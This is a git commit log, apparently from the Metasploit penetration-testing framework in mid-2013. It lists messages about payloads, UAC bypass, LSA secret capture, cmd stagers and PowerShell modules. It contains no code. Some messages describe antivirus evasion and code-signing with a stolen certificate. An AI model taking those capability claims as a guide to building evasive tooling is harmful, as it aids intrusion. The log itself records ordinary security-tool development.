2013-10-31 23:48:41 -05:00
d54c8a359b
Fix bug in proxy detection
2013-10-31 23:42:43 -05:00
7a33c48a0f
No double slash
2013-10-31 23:17:38 -05:00
5851d502b5
Rename some stuff
2013-10-31 23:12:20 -05:00
21891a8337
Make sure the browser can't retry by going to the first URL
2013-10-31 23:08:17 -05:00
94d62613ab
Pretty much done with these, remove these comments.
2013-10-31 19:04:11 -05:00
828ef9c64c
Adds target-specific payload generator
2013-10-31 18:54:01 -05:00
8a0ebcbac7
Adds method get_module_resource
2013-10-31 14:34:38 -05:00
10fd892827
Fix a "undefined method to_sym" bug
...
If something is undetectable, the value may be empty, which triggers
a undefined method error because the regex always assumes there is
something. So instead of +, we use *.
2013-10-31 14:06:05 -05:00
6e7e5a0ff9
Put postInfo() in the js directory
2013-10-31 13:55:22 -05:00
00efad5c5d
Initial commit for BrowserExploitServer mixin
2013-10-31 13:17:06 -05:00
f5d1d8eace
chmod -x .rb files without #! in modules and lib
...
It wasn't just cmdstager_printf.rb. :/
2013-10-30 19:51:25 -05:00
333a0d5820
chmod -x cmdstager_printf.rb
2013-10-28 18:47:14 -05:00
a476595ddb
Added require to post/windows
2013-10-25 14:42:22 -07:00
84999115d7
Added PSH option if UAC is turned off
...
This will give the option to drop an exe or use psh if uac is turned
off. The lib can be used for post exploitation to drop an exe or use
powershell and then execute it with the runas command. I have used the
lib for both bypassuac and ask.
2013-10-25 14:37:12 -07:00
b5f26455a3
Land #2545 , javascript library overhaul
2013-10-23 16:12:49 -05:00
caf41f34bf
Land #2562 - Fix RM 8510 (FileDropper)
2013-10-22 21:45:33 -05:00
acc73dd545
Land #2282 - BypassUAC now checks if the process is LowIntegrityLevel
2013-10-22 17:16:26 -05:00
7d1dc3746f
Use the @schierlm's command
2013-10-22 16:19:49 -05:00
dc0d9ae21d
Land #2560 , ZDI references
...
[FixRM #8513 ]
2013-10-22 15:58:21 -05:00
8611a2a24c
Merge remote-tracking branch 'upstream/master' into low_integ_bypassuac
2013-10-22 21:42:36 +01:00
ba1edc6fa8
Land #2402 - Windows Management Instrumentation Local -> Peers
2013-10-22 15:39:32 -05:00
4ad9bc5efe
Try to [FixRM #8510 ]
2013-10-22 08:42:14 -05:00
afcce8a511
Merge osdetect and addonsdetect
2013-10-22 01:11:11 -05:00
99d5da1f03
We can simplify this
2013-10-21 20:22:45 -05:00
9a3e719233
Rework the naming style
2013-10-21 20:16:37 -05:00
4fc8bb2b4b
Auto arch detection
2013-10-22 00:42:59 +01:00
9258d79978
Add ZDI references to reference.rb
2013-10-21 15:13:46 -05:00
032da9be10
Land #2426 - make use of Msf::Config.data_directory
2013-10-21 13:07:33 -05:00
e7d3206dc9
Revert "Land #2505" to resolve new rspec fails
...
This reverts commit 717dfefead6430fa3354
2013-10-21 12:47:57 -05:00
717dfefead
Land #2505 , missing source fix for sock_sendpage
2013-10-21 11:47:55 -05:00
8a94df7dcd
Change category name for base64
2013-10-18 21:20:16 -05:00
ffcb86eba2
Land #2541 , Outpost24 importer
...
Sample data is currently secret. If we get a hold of non-secret sample
data, it'll be tacked on to the Redmine bug referenced below.
[FixRM #8384 ]
2013-10-18 13:21:58 -05:00
4e4d0488ae
Rubyfy constants in privs lib
2013-10-18 18:26:07 +01:00
6f04a5d4d7
Cache Javascript
2013-10-18 12:23:58 -05:00
b0d614bc6a
Cleaning up requires
2013-10-18 01:47:27 -05:00
e450e34c7e
Merge branch 'master' of github.com:rapid7/metasploit-framework into low_integ_bypassuac
...
Conflicts:
modules/exploits/windows/local/bypassuac.rb
2013-10-17 23:35:36 +01:00
5a662defac
Post::Privs uses Post::Registry methods
2013-10-17 23:28:07 +01:00
c926fa710b
Move all exploitation-related JavaScript to their new home
2013-10-17 16:43:29 -05:00
8f2ba68934
move decrypt_lsa and decrypt_secret to priv too
2013-10-17 00:04:21 -04:00
541d932d77
move decrypt_lsa to priv as well
2013-10-16 23:53:33 -04:00
60d8ee1434
move capture_lsa_key to priv
2013-10-16 23:45:28 -04:00
1a9fcf2cbb
move convert_des_56_to_64 to priv
2013-10-16 23:39:07 -04:00
1a85bd22a8
move capture_boot_key to post win priv
2013-10-16 22:46:15 -04:00
4c91f2e0f5
Add detection code MS Office
...
Add detection code for MS Office XP, 2003, 2007, 2010, and 2012.
[SeeRM #8413 ]
2013-10-15 16:27:23 -05:00
38965f91ee
Add Outpost24 importer code to core/db.rb
2013-10-15 15:32:28 -05:00
676f12e50e
Import the new plaintext export format
...
Also:
* Import John the Ripper's plaintext from cracked NTLM hashes in the
same way
* Don't choke on : in passwords when reading JtR's output
* Fix some whitespace
* Show a count of inactive creds if there are any instead of acting like
they don't exist
2013-10-15 15:12:18 -05:00
35dd94f0ac
Land #2518 , uninitialized JavascriptOSDetect fix
2013-10-14 13:32:04 -05:00
e10dbf8a5d
Land #2508 - Add nodejs payloads
2013-10-14 12:23:31 -05:00
da3081e1c8
[FixRM 8482] Fix uninit constant Rex::Exploitation::JavascriptOSDetect
...
This fixes an uninit constant Rex::Exploitation::JavascriptOSDetect
while using a module with js_os_detect. It was originally reported
by Metasploit user @viniciuskmax
[FixRM 8482]
2013-10-14 11:40:46 -05:00
60f5567511
Output plaintext creds in a way john can use them
2013-10-13 13:36:03 -05:00
c7bcc97dff
Add SSL support to #nodejs_reverse_tcp.
2013-10-12 03:32:52 -05:00
6440a26f04
Move shared Node.js payload logic to mixin.
...
- this fixes the recursive loading issue when creating a payload
inside the cmd payload
- also dries up some of the node cmd invocation logic.
2013-10-12 03:19:06 -05:00
4d76e8e9ac
Add RPORT to the list of DCERPC ports to check
...
[FixRM #8479 ]
2013-10-11 16:23:38 -05:00
9ca9b4ab29
Merge branch 'master' into data_dir
...
Conflicts:
lib/msf/core/auxiliary/jtr.rb
2013-10-10 19:55:26 +01:00
4f1e71e222
Also this isn't Lua. Deal with commas.
2013-10-09 17:30:57 -05:00
c8dc251042
Alphabetize authors
...
Because alphabetizing is cool and makes it easy for humans to find
things in long array lists quickly.
Also, I need to keep my lines changed count up.
2013-10-09 17:29:17 -05:00
947925e3a3
Use a proper main signature with arguments
...
Allows us to `unlink(argv[0])`
2013-10-09 17:22:01 -05:00
9d34a8c894
Land #2465 , deal with missing cpuinfo bins
...
[FixRM #8456 ]
Thanks @ZeroChaos!
2013-10-09 13:03:48 -05:00
356263df56
Litter some more rescue nil's in there
...
I hate them but they were there when I got there.
A more sane way to deal with this should happen someday.
2013-10-09 12:17:13 -05:00
f95da649f8
Deal with missing bins, too.
...
This could be way more DRY. At least there's a YARD-ish comment.
This fixes up https://github.com/rapid7/metasploit-framework/pull/2465
to be a more complete solution.
[SeeRM #8465 ]
2013-10-09 12:13:44 -05:00
2593c06e7c
Land #2412 , @mwulftange's printf cmd stager
2013-10-08 09:08:29 -05:00
ff6dec5eee
Promote joev to a first class citizen
...
[See #2476 ]
2013-10-07 12:40:43 -05:00
836ff24998
Clean and fix CmdStagerPrintf
...
Clean up of the CmdStagerPrintf as discussed in mwulftange#1
2013-10-05 10:39:55 +02:00
5f4e4de267
fix for bug 8456
...
On systems without bundled johntheripper (either by removing the bundled version or by no compatible version shipped) the system john is used. In this case, all of the checking for compatible bundled jtr makes no sense and as such we can shortcut out of this to not only reduce the size of msf (for embedded) but also to speed execution (saving multiple calls to some random bundled binary cpuinfo*.bin).
This patch makes it very easy to simply remove cpuinfo and msf will not try to run it when missing and default to running john from the path.
2013-10-04 15:58:47 -04:00
541833e2cc
Convert llmnr_response to use Net::DNS
...
* Allows responding to AAAA requests in addition to the existing A
support
* Prevents problems when recvfrom returns a mapped address like
"::ffff:192.0.2.1"
Also:
* Fix a few typos
* capture: Don't shadow a method name (arp) with a local variable
* capture: Handle the case where our UDP send hits an ENETUNREACH
2013-10-04 12:35:30 -05:00
c460f943f7
Merge branch 'master' into data_dir
...
Conflicts:
modules/exploits/windows/local/always_install_elevated.rb
plugins/sounds.rb
scripts/meterpreter/powerdump.rb
scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
b822a41004
Axe errant tabs and unused vars
2013-10-02 13:47:39 -05:00
29a7059eb4
Update AlwaysInstallElevated to use a generated MSI file
...
Fixes bugs with MSI::UAC option, invalid logic and typo...
2013-09-29 17:09:03 +01:00
58cd2c796e
Add a bind port setting to reverse listeners
...
This adds a `ReverseListenerBindPort` advanced setting to the reverse listeners whic
allows for the local bind port to be separated from the `LHOST` setting used in the
payload. This means that listeners can bind to different ports in cases where the
attacker isn't able to listen on the same port that the victim can call out on, but
there are NATs/portforwards/whatever in place that allow the connection to happen.
2013-09-28 05:38:39 +10:00
8a9843cca6
Merge upstream/master
2013-09-27 20:02:23 +01:00
971d0b7536
Generate args
2013-09-27 12:48:10 +01:00
3d812742f1
Merge upstream master
2013-09-26 21:27:44 +01:00
7ba846ca24
Find and replace
2013-09-26 20:34:48 +01:00
a25833e4d7
Fix %TEMP% path
2013-09-26 19:22:36 +01:00
8696b5d2dc
Fix bug on missing hosts for SunRPC Portmap
...
Also cleans up and normalizes the print messages to follow the
conventions of "host:port - proto - message"
[FixRM #8409 ], reported by Chris F.
2013-09-26 09:42:38 -05:00
58d4096e0f
Resolv conflicts on #2267
2013-09-25 13:06:14 -05:00
99e46d2cdb
Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
...
Conflicts:
modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
8db1a389eb
Land #2304 fix post module require order
...
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
9353929945
Add CmdStagerPrintf
2013-09-23 22:02:29 +02:00
695fdf836c
Generate NonUAC MSIs
2013-09-21 13:13:18 +01:00
85ea9ca05a
Merge branch 'master' of github.com:rapid7/metasploit-framework into msi_payload
2013-09-21 12:49:38 +01:00
a08d195308
Add Node.js as a platform.
...
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
87f75e1065
Complete CmdStagerEcho code doc
2013-09-20 13:24:53 -05:00
7d1c5c732a
Correct powershell
2013-09-20 18:36:24 +01:00
5add142789
Choose smallest smallest
2013-09-20 13:47:51 +01:00
a00f3d8b8e
initial
2013-09-20 13:40:28 +01:00
e9e1b28ba8
Land #2371 , echo -e cmd stager
2013-09-19 14:47:39 -05:00
8fe9132159
Land #2358 , deprecate funny names
2013-09-18 14:55:33 -05:00
150f0f644e
Merge branch 'rapid7' into bug/osx-mods-load-order
...
Conflicts:
modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
dae8847c4d
Land #2374 , more complete 32/64 migrate fix
...
[FixRM #8395 ]
2013-09-17 14:52:04 -05:00
9aca98a9d4
Dont need to bypass
2013-09-17 19:12:49 +01:00
c77d49a640
Merge branch 'rapid7' into cleanup/remove-id-tags
...
Conflicts:
lib/msf/core/payload/osx/bundleinject.rb
lib/msf/core/payload/windows/dllinject.rb
lib/msf/core/payload/windows/exec.rb
lib/msf/core/payload/windows/loadlibrary.rb
lib/msf/core/payload/windows/reflectivedllinject.rb
lib/msf/core/payload/windows/x64/reflectivedllinject.rb
scripts/meterpreter/netenum.rb
2013-09-17 10:55:02 -05:00
97d3a20f82
Remove more $Revision tags
2013-09-17 10:46:37 -05:00
d6954e9ce7
Fix migrate from 32- to 64-bit processes
...
In some cases, it was possible to end up in a situation where the x64
reflective library hadn't been loaded by the time a user typed migrate.
If the target process was 64-bit, msfconsole would error out with a
NoMethodError and much sadness would ensue.
[See #2356 ]
2013-09-16 16:04:50 -05:00
a8198bc948
Add documentatio to the mixin
2013-09-16 11:55:30 -05:00
a5049df320
Add echo CmdStager
2013-09-16 11:35:05 -05:00
60328d5b2a
Bypass no profile and hidden by default
2013-09-13 21:22:15 +01:00
53a7e74813
Land #2360
...
All the specs pass, and it's difficult to repo many of these cases to
see if bugs are actually here, but it's a good idea to enforce binary
regexs.
2013-09-13 14:43:53 -05:00
9ade4cb671
Refactor
2013-09-13 20:43:09 +01:00
aa4ad2b005
Change to ' and remove "
2013-09-13 20:23:18 +01:00
243d3d6ebd
Apply comments
2013-09-13 19:19:54 +01:00
72dff03426
FixRM #8396 change all lib use of regex to 8-bit pattern
2013-09-12 16:58:49 -05:00
6cc5965123
Land #2278 , exe injection refactor
2013-09-12 16:37:58 -05:00
76f27ecde8
Require the deprecation mixin in all modules
...
Because rememberin to require it, and hoping against a race is not how we
roll any more.
2013-09-12 15:49:33 -05:00
e80cda4ace
Merge branch 'master' into spike/exe_generation
2013-09-12 12:36:10 -05:00
30c2efe3b2
Add require for eventlog
...
Even though nothing uses it except an old script
2013-09-11 16:21:10 -05:00
80243c6e4d
Disable default sorting on MSSQL results
...
When printing output using the `mssql_print_reply`, the output gets
sorted by default by the first column. This can distort the output,
especially when the row order is crucial like in case of executing
external commands with `mssql_xpcmdshell`.
This patch disables sorting by initializing Rex::Ui::Text::Table
with SortIndex = -1.
2013-09-09 20:14:48 +02:00
5773a009f5
Merge branch 'spike/exe_generation' of github.com:/dmaloney-r7/metasploit-framework into spike/exe_generation
2013-09-09 12:17:36 -05:00
d6e4e46d86
better validation of buffer register
2013-09-09 12:16:15 -05:00
eb745af12f
Land #1054 , @Meatballs1 exploit for IPsec Keying and more
2013-09-05 16:53:20 -05:00
2bd1fb451b
Retab changes for PR #1569
2013-09-05 16:16:05 -05:00
48cf2af685
Merge for retab
2013-09-05 16:16:00 -05:00
adfb31e30a
Land #2316 , don't modify datastore in authbrute
2013-09-05 16:04:15 -05:00
368a78a963
Undo post setup change
2013-09-05 15:00:58 -05:00
d4043a6646
Spaces and change to filedropper
2013-09-05 20:41:37 +01:00
c5daf939d1
Stabs tabassassin
2013-09-05 20:36:52 +01:00
874ed2ac17
Retab changes for PR #2107
2013-09-05 14:30:08 -05:00
27564b2de2
Merge for retab
2013-09-05 14:30:03 -05:00
41f6ab3073
Land #2294 , fix post setup
...
Conflicts:
lib/msf/core/post.rb
2013-09-05 14:11:32 -05:00
f5a4c05dbc
Retab changes for PR #2267
2013-09-05 14:11:03 -05:00
4703a10b64
Merge for retab
2013-09-05 14:10:58 -05:00
63612a64e9
Merge for retab
2013-09-05 14:08:09 -05:00
d0360733d7
Retab changes for PR #2282
2013-09-05 14:05:34 -05:00
49dface180
Merge for retab
2013-09-05 14:05:28 -05:00
845bf7146b
Retab changes for PR #2304
2013-09-05 13:41:25 -05:00
adf9ff356c
Merge for retab
2013-09-05 13:41:23 -05:00
abb52a086c
Retab changes for PR #2316
2013-09-05 13:33:59 -05:00
8665de0261
Merge for retab
2013-09-05 13:33:49 -05:00
896bb129cd
Retab changes for PR #2325
2013-09-05 13:24:09 -05:00
5ff25d8b96
Merge for retab
2013-09-05 13:23:25 -05:00
b913fcf1a7
Add a proper PrependFork for linux
...
Also fixes a typo bug for AppendExit
2013-09-04 00:15:07 -05:00
1471a4fcef
Fixes an error in file_dropper where @dropped_files is nil
...
causing an exception to be raised and on_new_session to fail.
I have moved super to the top of the chain so it always gets
called regardless.
2013-09-03 23:45:41 +01:00
c687f23b81
Better error handling
2013-09-03 22:57:27 +01:00
a8e77c56bd
Updates
2013-09-03 22:46:20 +01:00
ac0c493cf9
Merge branch 'master' of github.com:rapid7/metasploit-framework into local_win_priv_keyring
2013-09-03 21:33:11 +01:00
13244efecf
Spacing and bugfixes
2013-09-02 21:57:11 +01:00
051ef0bdfa
Refactor to common post module
2013-09-02 20:24:54 +01:00
560d384633
Do first modification to Auxiliary::Login and Auxiliary::AuthBrute
2013-08-31 23:38:04 -05:00
7e5e0f7fc8
Retab lib
2013-08-30 16:28:33 -05:00
53c3f6b2db
Deconflict
2013-08-30 10:52:42 +01:00
37f8d7a536
And one more.
2013-08-29 23:52:00 -05:00
49bfc84ea6
Bah, missed changes after refactor
...
Thanks, travis-ci!
2013-08-29 23:39:29 -05:00
63adde2429
Fix load order in posts, hopefully forever
2013-08-29 13:37:50 -05:00
ab58e2db41
Ensure PostMixin setup is called
2013-08-27 18:03:30 -05:00
a91b38cbf4
Land #2276 - osx webcam and record_mic post modules
2013-08-27 12:28:14 -05:00
007b3de06d
Merge pull request #2271 from bturner-r7/bug/db-leaks
...
Land #2271 , Fix database connection leaks
2013-08-26 14:39:11 -07:00
5a424ab4df
Allow user supplied buffer register
...
let the user pick, otherwise default to edx
2013-08-26 13:15:12 -05:00
3b9ded5a8e
BypassUAC now checks if the process is LowIntegrityLevel
...
and fails if so. Some small improvements made to Post::Priv
and BypassUAC module.
2013-08-26 13:54:55 +01:00
383c9ed7f8
set edx as a BufferRegister
...
polymorphic encoders can now always use EDX
as a BufferRegister, making it harder to catch
the decoder stub.
2013-08-25 14:18:32 -05:00
96c093dce0
Fix Exploit::Exe
2013-08-25 19:56:29 +01:00
66ee15f461
Merge and deconflict
2013-08-25 19:14:15 +01:00
f5e9089dd5
remove dupe comment
2013-08-25 12:46:47 -05:00
a50fa2deec
style fixups
2013-08-25 12:37:30 -05:00
035258389f
use feed first before trying to bruteforce
2013-08-25 10:16:43 +02:00
4c57af051a
Revert "'remove unused framework references"
...
This reverts commit 98a09b9f5c
2013-08-24 17:52:57 -05:00
98a09b9f5c
'remove unused framework references
...
passing around framework references that are never used
removing these whever possible
2013-08-24 16:59:29 -05:00
8f47aa6dcb
Basic Injector class
...
create a class for injecting payloads
into an exe template as a new section
2013-08-24 16:11:00 -05:00
7cd150b850
another module
2013-08-24 18:42:22 +02:00
2d3f599498
Moves ruby_dl helpers to proper place in repo.
...
* Adds fail_with methods and moves timeouts to constants.
2013-08-23 17:17:19 -05:00
cd45c77080
Fix a few database leaks
...
All database access should be wrapped in with_connection blocks.
To avoid breaking git blame with a bunch of whitespace, I outdented
the with_connection blocks as seems to be common in db.rb.
[Story #55586616 ]
2013-08-21 18:53:17 -05:00
c0700673e7
Fix SessionManager database leak
...
All database access should be wrapped in with_connection blocks.
Much of this commit is whitespace. It may help to view it with
--ignore-all-space or the w=0 parameter on GitHub.
[Story #55586616 ]
2013-08-21 17:34:25 -05:00
009d8796f6
wordpress is now a module, not a mixin
2013-08-22 00:05:58 +02:00
0a2bf9e9e7
implement @limhoff-r7 feedback
2013-08-21 21:10:00 +02:00
2e9a579a08
implement @limhoff-r7 feedback
2013-08-21 21:05:52 +02:00
ffdd057f10
-) Documentation
...
-) Added Wordpress checks
2013-08-21 14:27:11 +02:00
655e2dcf6c
more methods
2013-08-21 13:13:41 +02:00
68a51f4055
msftidy
2013-08-21 12:50:26 +02:00
11ef8d077c
-) added wordpress mixin
...
-) fixed typo in web mixin
2013-08-21 12:45:15 +02:00
f148eb4715
Land #2255 - Fix fail_with()
2013-08-20 01:28:21 -05:00
491ea81acf
Fix calls to fail_with from mixins
2013-08-19 16:42:52 -05:00
7e37130837
Patch for [SeeRM #8315 ]
2013-08-19 16:34:02 -05:00
1eb3c323ed
Land #2175 , force string encoding for RPC
...
Metasploit takes great pains to ensure that all strings are encoded as
plain old US-ASCII. This PR enforces this conversion over RPC as well.
[FixRM #7888 ]
2013-08-16 16:09:24 -05:00
7937fbcc49
More idiomatic ruby with symbols and spaces
2013-08-16 15:59:04 -05:00
bec15ebf7c
Remove Failure (moved to parent class)
2013-08-15 13:31:21 -05:00
4706f8b54c
Add fail_with() stub and move Failure from Exploit
2013-08-15 13:30:47 -05:00
bd6a45fffa
Get rid of version() use
2013-08-14 11:00:09 -05:00
83aec3b231
Remove module version display
...
Since modules no longer use the 'Version' key, there's no point to
collect and show them. It's all 0 anyway.
[See RM 8278]
2013-08-14 02:26:39 -05:00
3827b14103
Land #1726 , ssl verify mode
...
Conflicts:
lib/rex/socket/parameters.rb
Fix doc strings
2013-08-12 17:57:10 -05:00
8278808a37
Merge pull request #2204 from todb-r7/bug/undo-optstring-validator
...
Revert "OptString specs and better validation"
2013-08-09 13:42:46 -07:00
02f460287b
Revert "OptString specs and better validation"
...
This reverts commit d66779ba4c
2013-08-09 15:30:42 -05:00
4558aca7ca
Land #2136 - Removed requirement for note.data to be present
2013-08-09 15:29:25 -05:00
08c32c250f
File versions
2013-08-08 19:42:14 +01:00
2c850d8f8b
Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import
2013-07-31 18:39:46 -04:00
7c46e95e8f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into powershell_import
2013-07-31 18:34:57 -04:00
9180dd59fe
Patch for string encoding issues with `msgpack`
...
Fixes an issue that causes exploits to fail if the PAYLOAD option is the last option to get marshalled in an MSFRPC dictionary. The patch adjusts the string's encoding to match the internal default encoding used by Ruby. Hence, making `fetch()` succeed.
2013-07-30 13:38:44 -04:00
7e539332db
Reverting disaster merge to 593363c5f with diff
...
There was a disaster of a merge at 6f37cf22eb593363c5f9
2013-07-29 21:47:52 -05:00
05be76ecb7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-29 16:41:22 -05:00
593363c5f9
Land #2154 , @wchen-r7's msfcli optimizations and refactoring
2013-07-29 16:38:32 -05:00
e1cfe7cfe2
Update datastore changes
2013-07-29 15:31:59 +01:00
a0decf502f
Refactor msfcli
2013-07-28 12:40:50 -05:00
4a0b33241f
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 18:41:50 -05:00
7b7603a5e7
Land #2104 - reverse_https_proxy
2013-07-25 17:26:56 -05:00
33f6f7e8fc
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-25 17:03:45 -05:00
27a540e12f
Land #1215 , creds reuse for AuthBrute modules
2013-07-25 16:54:44 -05:00
2b3dcaf678
Land #2157 , @wvu and @averagesecurityguy patch for OpenVAS XML Reports importing
2013-07-25 12:04:38 -05:00
97680304d6
Use index, since it can apparently do regex
2013-07-25 12:00:33 -05:00
56367ef69c
Update documentation
2013-07-24 19:04:47 -05:00
0fd2c385fb
Update documentation
2013-07-24 19:02:10 -05:00
e266d1bd0a
Add comment about opts
2013-07-24 19:00:58 -05:00
a71d7eb372
Update archive.rb to handle whitelist
2013-07-24 18:59:43 -05:00
9ae550c883
Do if [].empty?. Avoid msfcli running as a job
2013-07-24 18:35:06 -05:00
ed51d284fa
Change name, change how data is passed, fix rspec
2013-07-24 17:15:56 -05:00
e120ecfba9
msfcli is designed to load only one module (auxiliary or exploit),
...
so we shouldn't have to load all of them to run this utility. The
overall goal of this PR is to narrow down what modules
(exploit/aux + payload + encoder + nop) you possibly need in order
to shave off loading time. By doing this, on my box this is 5-6
seconds faster than the original one.
I actually tried to avoid making too many changes in the library
(such as Module Manager), because we don't have test cases for them,
and we can't really afford to risk breaking it. I also developed
a test script to actually be able to test msfcli.
2013-07-24 14:40:46 -05:00
e9a4f6d5da
Merge branch 'dll_fix' of https://github.com/Meatballs1/metasploit-framework
2013-07-24 14:00:52 -05:00
fee5fabb91
Revert x64 corruption changes
2013-07-24 19:59:04 +01:00
44cae75af1
Cleanup
2013-07-24 19:52:59 +01:00
4b84b49674
Fix payload corruption
2013-07-24 19:08:02 +01:00
47c21dfe85
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-24 11:42:11 -05:00
d493346691
Land #2137 , fixes and specs for Opt containers
2013-07-23 15:58:09 -05:00
b0c17fdebc
Land #2002 , @jlee-r7's patch for better handling uri resources
2013-07-23 15:49:21 -05:00
99a345f8d1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-22 13:54:26 -05:00
77e8250349
Add support for CWE
2013-07-22 12:13:56 -05:00
4df3b0215c
replace lib/msf/core/exploit/powershell.rb, thanks @Meatballs1
2013-07-20 19:55:01 -04:00
943dde5c6c
OptRegexp specs
2013-07-20 18:44:55 -05:00
9d93891395
Import old powershell post lib from master
...
This is temporary and rather messy. Since the internals for
dealing with PSH code have moved to Rex there may be a hiccup or
two here. This was my original attempt at basic PSH integration
and does not make use of the new libraries and namespaces in
this PR.
Will introduce the updated modules and libraries in separate PR.
2013-07-20 19:33:19 -04:00
eb185375f7
Trim to core requirements
...
Remove .NET compiler, post lib and modules.
2013-07-20 19:31:26 -04:00
dc15c5b505
Merge branch 'master' into powershell_import
...
Resolve conflicts from old code being pulled into master.
Conflicts:
lib/msf/core/exploit/powershell.rb
modules/exploits/windows/smb/psexec_psh.rb
2013-07-20 19:29:55 -04:00
d66779ba4c
OptString specs and better validation
2013-07-20 17:49:03 -05:00
d6f2b28708
More opt specs
2013-07-20 17:37:39 -05:00
832db57171
Removed requirement for note.data to be present. It wasn't required in
...
the model or in specs, but was in db.rb, resulting in an error during
certain import scenarios.
2013-07-20 10:27:12 -05:00
ec82644bd3
mo fixes mo specs
...
SEERM #7536
SEERM #7537
2013-07-18 15:00:57 -05:00
1a5e0e10a5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-18 13:53:57 -05:00
9d92b38dc7
Land #2121 - add specs for module search filter
2013-07-18 13:50:26 -05:00
67d8c1170b
Remove unnecessary whitespace.
2013-07-18 13:43:30 -05:00
57dd525714
More optaddressrange specs and fixes
...
SEERM #7536
2013-07-18 13:03:32 -05:00
f4b0ab8184
Adds 141 passing specs to Msf::Module#search_filter.
...
* tests exclusion functionality, type: matching, port: matching, app: matching,
platform: matching, author: matching, text: matching, name: matching, and
path: matching.
[RM #4790 ]
2013-07-18 12:47:08 -05:00
22e4db04e0
opening specs and fixes for OptAddressRange
2013-07-18 12:44:48 -05:00
27e2469d8e
Specs and code changes for OptAddress
...
handles wierness around Optaddress.
Still need to address isues in optaddressRange
FIXRM #7537
2013-07-17 20:21:24 -05:00
58229ff8b7
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-07-17 20:18:48 -05:00
72df070b80
Bump version to 4.8.0-dev, -rls is so fleeting
2013-07-17 16:43:24 -05:00
8d1a760b1f
Bump version to -rls
2013-07-17 16:42:37 -05:00
11f8b351c0
Merge branch 'nvidia' of https://github.com/Meatballs1/metasploit-framework
2013-07-17 11:44:42 -05:00
a5d526d710
remove metsrv.dll
2013-07-15 17:16:21 +01:00
e28dd42992
add http authentification and socks
2013-07-15 15:36:58 +01:00
f48c70d468
enable tor and small fix
2013-07-13 17:59:49 +01:00
94f8b1d177
Land #2073 , psexec_psh
2013-07-12 16:14:17 -05:00
91b748a701
Make it clear where we failed
...
Even when VERBOSE=false
2013-07-12 15:57:30 -05:00
e8983a21c5
New meterpreter payload reverse_https_proxy
2013-07-12 16:45:16 -04:00
e8294b4f02
Add tentative fixes
2013-07-12 07:12:07 -05:00
1ac1d322f2
Dup before modifying
...
Because `remove_resource` modifies @my_resources, we can't call it while
iterating over the actual @my_resources. The following snippet
illustrates why:
```
>> a = [1,2,3,4]; a.each {|elem| a.delete(elem); puts elem }
1
3
=> [2, 4]
```
[See #2002 ]
2013-07-12 00:57:10 -05:00
38e837dc28
Remove inaccurate comment
2013-07-11 22:48:35 -05:00
f267c11bc4
Add regex fix
2013-07-10 15:43:16 -05:00
56ffa4ae2f
Fixes for network_interface PR #2085
...
Implementing the suggestions from @limhoff-r7.
See #2085
FixRM #8023
FixRM #7943
2013-07-10 13:25:06 -05:00
4541a9e49e
now with passing msftidy
2013-07-08 17:44:50 -05:00
5c93fb2849
arp_sweep is once again working
...
modified the capture mixin to use NetworkInteface instead of
pcaprub for interfaces and addresses
FIXRM #8023,#7943
2013-07-08 17:24:28 -05:00
2bfe8b3b29
msftidy
2013-07-05 22:35:22 +01:00
0ce3fe2e7c
Added service status checks to Post::Windows::Services
...
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
2013-07-05 22:25:04 +01:00
0e2380c115
Fix method documentation
2013-07-05 11:19:53 -05:00
4554cc6e51
Import Powershell libs and modules (again)
...
Add Rex powershell parser:
reads PSH, determines functions, variables, blocks
compresses and cleans up the code it's read, obfuscates
handles string literals and reserved variable names
extracts code blocks and functions for reuse
turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules
Make use of Rex parser
Handles payload generation, substituions
Brings convenience methods - byte array generation and download
Re-add .NET compiler
Compiles .NET code (C#/VB.NET) in memory
Can generate binary output file (dynamic persistence)
Handles code-signing (steal cert with mimikatz, sign your bin)
Not detected by AV (still...)
Update payload generation
GZip compression and decompression (see Rex module as well)
msftidy violations for space efficiency - each char counts
Re-submit psexec-psh
Makes use of updated Msf and Rex modules
Runs shellcode in-memory (in a hidden PSH window)
Completely bypasses all AVs tested for the last year...
2013-07-04 14:04:19 -04:00
1a0bdf335e
Retab lib
2013-07-04 12:09:46 +01:00
a76ee6c2ec
Add flexibility to lib
2013-07-04 11:03:48 +01:00
1368c1c27f
Move options to lib
2013-07-04 10:25:08 +01:00
03de8c1c3d
Pull in exploit/powershell
2013-07-04 09:54:40 +01:00
0f37bbe78e
Add has_pid? function
...
[SeeRM:#8123] - Add commonly used function has_pid?. Related to
redmine issue 8123.
2013-07-02 14:33:15 -05:00
a5c3f4ca9b
Modify ruby code according to comments
2013-06-29 08:54:00 -05:00
e3989ad30c
Extra comments, no thanks
2013-06-28 15:44:06 -05:00
f4c805f5d6
Yarrrrrrrrd
2013-06-28 15:42:56 -05:00
6e1fa05757
Fix a handle leak & change thread creation flag
2013-06-28 13:23:08 -05:00
554d738f26
Update documentation
...
Fix broken English
2013-06-28 13:03:05 -05:00
b7430cb569
Add Msf::Post::Windows::Process
...
The purpose of Msf::Post::Windows::Process is have all the common
functions you might need to do something to a process, for example:
injecting something to a process and then run it.
2013-06-28 12:55:06 -05:00
ea13ac48ec
"fix" indentation to make egypt happy
2013-06-27 17:16:13 -05:00
89faba288d
damnit brandon turner
2013-06-27 17:12:37 -05:00
867be1257a
slight rearrangement
2013-06-27 17:09:20 -05:00
e3fde02eec
conditional wrapping
...
as per egypt's catch
2013-06-27 17:07:16 -05:00
70433820a9
fixes FD leak in RPC client
...
FD leak due to sockets not getting closed
on the rpc client
FIXRM #8107
2013-06-27 16:57:02 -05:00
d7eda343e9
